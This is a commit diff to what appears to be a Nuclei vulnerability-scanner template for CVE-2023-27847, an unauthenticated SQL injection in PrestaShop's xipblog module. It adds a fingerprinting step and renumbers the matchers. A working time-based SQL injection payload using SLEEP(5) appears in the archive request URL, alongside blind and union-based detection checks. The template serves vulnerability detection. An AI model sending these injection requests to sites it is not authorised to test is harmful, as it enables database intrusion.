Update CVE-2023-27847

2024-08-01 04:07:53 +03:00 · 2024-08-01 04:07:53 +03:00 · dfe475596a
parent 96ca8aa4ad
commit dfe475596a
1 changed files with 19 additions and 8 deletions
--- a/http/cves/2023/CVE-2023-27847.yaml
+++ b/http/cves/2023/CVE-2023-27847.yaml
@ -25,6 +25,10 @@ info:
    shodan-query: http.component:"Prestashop"
  tags: cve,cve2023,prestashop,sqli,unauth,xipblog

+
+flow: http(1) && http(2)
+
+
 http:
  - raw:
      - |
@ -32,7 +36,17 @@ http:
        GET / HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
+    host-redirects: true
+    max-redirects: 3
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "xipblog")'
+        condition: and
+        internal: true
        
+  - raw:
      - |
        @timeout: 20s
        GET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+AND+(SELECT+5728+FROM+(SELECT(SLEEP(5)))AuDU)--+lafl HTTP/1.1
@ -63,21 +77,18 @@ http:
      - type: dsl
        name: time-based
        dsl:
-          - 'duration_2>=5'
-          - 'status_code_1 == 200 && contains(body_1, "xipblog")'
+          - 'duration_1>=5'
        condition: and

      - type: dsl
        name: blind-based
        dsl:
-          - 'status_code_1 == 200 && contains(body_1, "xipblog")'
-          - 'contains(body_3, "kr_blog_post_area")'
-          - '!contains(body_4, "kr_blog_post_area")'
+          - 'contains(body_2, "kr_blog_post_area")'
+          - '!contains(body_3, "kr_blog_post_area")'
        condition: and

      - type: dsl
        name: union-based
        dsl:
-          - 'status_code_1 == 200 && contains(body_1, "xipblog")'
-          - 'contains(body_5, "c8c605999f3d8352d7bb792cf3fdb25b")'
+          - 'contains(body_4, "c8c605999f3d8352d7bb792cf3fdb25b")'
        condition: and